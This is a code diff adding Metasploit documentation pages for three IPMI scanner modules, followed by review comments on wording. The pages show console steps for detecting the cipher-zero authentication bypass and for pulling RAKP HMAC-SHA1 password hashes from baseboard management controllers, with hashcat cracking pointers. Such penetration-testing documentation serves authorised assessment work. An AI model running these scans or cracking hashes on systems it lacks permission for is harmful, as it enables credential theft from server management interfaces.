diff --git a/documentation/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.md b/documentation/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.md new file mode 100644 index 0000000000..a1a659e73c --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.md @@ -0,0 +1,20 @@ +The ipmi_cipher_zero module is used to find IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability through the use of IPMI cipher zero, which means no cipher is used at all. + +## Vulnerable Devices + +This is an error in the IPMI 2.0 specification itself, so any device BMC fully implementing IPMI 2.0 will possibly have the vulnerable non-cipher enabled. + +## Verification Steps + +Set RHOSTS to the target device or range and run: + +``` +msf > use auxiliary/scanner/ipmi/ipmi_cipher_zero +msf auxiliary(ipmi_cipher_zero) > set RHOSTS 192.168.1.2 +RHOSTS => 192.168.1.2 +msf auxiliary(ipmi_cipher_zero) > run + +[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts) +[*] 192.168.1.2:623 - IPMI - NOT VULNERABLE: Rejected cipher zero with error code 17 + +``` diff --git a/documentation/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.md b/documentation/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.md new file mode 100644 index 0000000000..a2dea7c4a4 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.md 
@@ -0,0 +1,34 @@ +The ipmi_dumphashes module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300. + +## Vulnerable Devices + +Any IPMI 2.0 device implementing the RAKP protocol according to the IPMI specification is vulnerable. This is a design flaw rather than a vendor-specific vulnerability. + +## Verification Steps + +Set RHOSTS to the target device or range and run: + +``` +msf > use auxiliary/scanner/ipmi/ipmi_dumphashes +msf auxiliary(ipmi_dumphashes) > set RHOSTS 192.168.1.2 +RHOSTS => 192.168.1.2 +msf auxiliary(ipmi_dumphashes) > run + +[*] 192.168.1.2:623 - IPMI - Sending IPMI probes +[*] 192.168.1.2:623 - IPMI - Trying username 'ADMIN'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username ADMIN: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username 'admin'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username admin: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username 'root'... +[+] 192.168.1.2:623 - IPMI - Hash found: root:redacted +[*] 192.168.1.2:623 - IPMI - Trying username 'Administrator'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username Administrator: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username 'USERID'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username USERID: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username 'guest'... +[-] 192.168.1.2:623 - IPMI - Returned error code 13 for username guest: Unauthorized name +[*] 192.168.1.2:623 - IPMI - Trying username ''... +[+] 192.168.1.2:623 - IPMI - Hash found: redacted +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` 
diff --git a/documentation/modules/auxiliary/scanner/ipmi/ipmi_version.md b/documentation/modules/auxiliary/scanner/ipmi/ipmi_version.md new file mode 100644 index 0000000000..556eceeba7 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/ipmi/ipmi_version.md @@ -0,0 +1,21 @@ +The ipmi_version module is used to identify the version of the IPMI specification implemented by devices on a network. + +## Target Devices + +Any exposed device that implements the IPMI specification should work with this module. This is a recon module rather than an exploitation module. + +## Verification Steps + +Set RHOSTS to the target device or range and run: + +``` +msf > use auxiliary/scanner/ipmi/ipmi_version +msf auxiliary(ipmi_version) > set RHOSTS 192.168.1.2 +RHOSTS => 192.168.1.2 +msf auxiliary(ipmi_version) > run + +[*] Sending IPMI requests to 192.168.1.2->192.168.1.2 (1 hosts) +[*] 192.168.1.2:623 - IPMI - Probe sent +[+] 192.168.1.2:623 - IPMI - IPMI-2.0 OEMID:180010 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0) + +``` diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb index 56bf04f8e5..48396e70d1 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'IPMI 2.0 Cipher Zero Authentication Bypass Scanner', 'Description' => %q| - This module identifies IPMI 2.0 compatible systems that are vulnerable + This module identifies IPMI 2.0-compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero. |, diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb index 86ef288890..61259b1e99 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb 
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval', 'Description' => %q| - This module identifies IPMI 2.0 compatible systems and attempts to retrieve the + This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
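Review bot: In the new ipmi_cipher_zero.md, the opening sentence mis-describes the flaw: "cipher zero, which means no cipher is used at all" conflates the cipher suite with encryption, whereas cipher suite 0 is the suite that requires no authentication, which is exactly why it is an authentication bypass; suggest "through the use of cipher suite 0, which the specification allows to be accepted without any authentication". The same sentence is also redundant ("vulnerable to an authentication bypass vulnerability"); "susceptible to authentication bypass through the use of cipher suite 0" reads better. Under "Vulnerable Devices", "any device BMC fully implementing IPMI 2.0 will possibly have the vulnerable non-cipher enabled" is awkward; suggest "any BMC that fully implements IPMI 2.0 may have cipher suite 0 enabled". Finally, the only sample output shown is the NOT VULNERABLE case ("Rejected cipher zero with error code 17"); a reader cannot tell from the page what a positive hit looks like, so either add the vulnerable-result line from a real run or state that a vulnerable target is reported with a `[+]` line rather than leaving it implicit.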
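Review bot: The new ipmi_dumphashes.md copies the module description verbatim, including its typo "as well hashcat (cpu) 0.46 or newer" (should be "as well as hashcat"), and the "(cpu) 0.46" version reference is stale for a freshly written page; suggest "as well as hashcat using hash mode 7300 (IPMI2 RAKP HMAC-SHA1)". The text mentions the OUTPUT_FILE option but the Verification Steps never set it, so the page does not show how the hashes actually get written out for hmac_sha1_crack.rb or hashcat; add a `set OUTPUT_FILE /path/to/hashes.txt` line before `run`, or an Options section describing it. The sample output also shows the module trying a list of usernames (ADMIN, admin, root, Administrator, USERID, guest, and the empty user) without the page saying where that list comes from; a sentence noting that these are the module's built-in defaults would tell the reader what "default usernames" means.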
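Review bot: The new ipmi_version.md uses a "## Target Devices" heading while the two sibling pages added in this same change use "## Vulnerable Devices"; since ipmi_version is recon rather than exploitation the wording is defensible, but it should be a deliberate choice and ideally match the documentation template the other module pages follow. The sample output line "IPMI-2.0 OEMID:180010 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2) Level(1.5, 2.0)" packs in several fields the page never explains; a short sentence saying that UserAuth/PassAuth list the authentication and password-hashing methods the BMC advertises and Level lists the supported IPMI versions would make the output usable to someone who has not read the module source.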
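Review bot: In the ipmi_cipher_zero.rb hunk the only change is the hyphen in "IPMI 2.0-compatible", but the unchanged context line right after it still reads "vulnerable to an authentication bypass vulnerability through the use of cipher zero", which is the same redundant phrasing the new docs inherit; since the description is being touched anyway, suggest "susceptible to authentication bypass through the use of cipher suite 0" so the module text and the documentation page agree.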
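Review bot: In the ipmi_dumphashes.rb hunk the hyphen fix leaves the typo on the unchanged context line "in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300" ("as well hashcat" should be "as well as hashcat"); fixing it here as well keeps the module description consistent with the documentation page, and the "(cpu) 0.46" qualifier can be dropped in favour of "hashcat hash mode 7300" since that is the detail a user needs.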